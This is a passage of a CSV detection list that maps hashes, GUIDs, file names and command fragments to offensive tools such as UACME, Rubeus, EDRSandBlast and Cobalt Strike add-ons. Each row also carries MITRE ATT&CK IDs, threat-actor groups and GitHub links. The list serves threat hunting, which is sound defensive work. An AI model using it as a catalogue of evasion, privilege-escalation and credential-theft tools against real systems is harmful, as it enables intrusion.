T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,0,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*639EF517-FCFC-408E-9500-71F0DC0458DB*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*-64 -format=reflective-dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*6563686f2048656c6c6f204261636b646f6f72*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*658C8B7F-3664-4A95-9572-A3E5871DFC06*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*66e0681a500c726ed52e5ea9423d2654*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*7.exe a -mx3 ad.7z ad_*.txt*,offensive_tool_keyword,7zip,7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1074.001 - T1083 - T1560.001 - T1105,TA0003 - TA0007 - TA0009,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*70527328-DCEC-4BA7-9958-B5BC3E48CE99*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*713724C3-2367-49FA-B03F-AB4B336FB405*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,0,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*73948912-CEBD-48ED-85E2-85FCD1D4F560*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,0,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*7443/new/payloads*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*76FFA92B-429B-4865-970D-4E7678AC34EA*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*79F54747-048D-4FD6-AEF4-7B098F923FD8*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*7CFC52.dll*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*7CFC52CD3F.dll*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*7E47D586-DDC6-4382-848C-5CF0798084E1*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*7z2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*81E60DC6-694E-4F51-88FA-6F481B9A4208*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*82277B35-D159-4B44-8D54-FB66EDD58D5C*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,0,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*83035080-7788-4EA3-82EE-6C06D2E6891F*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,0,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*854A20FB-2D44-457D-992F-EF13785D2B51*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*866e5289337ab033f89bc57c5274c7ca*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*87904247-C363-4F12-A13A-3DA484913F9E*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*879A49C7-0493-4235-85F6-EBF962613A76*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - 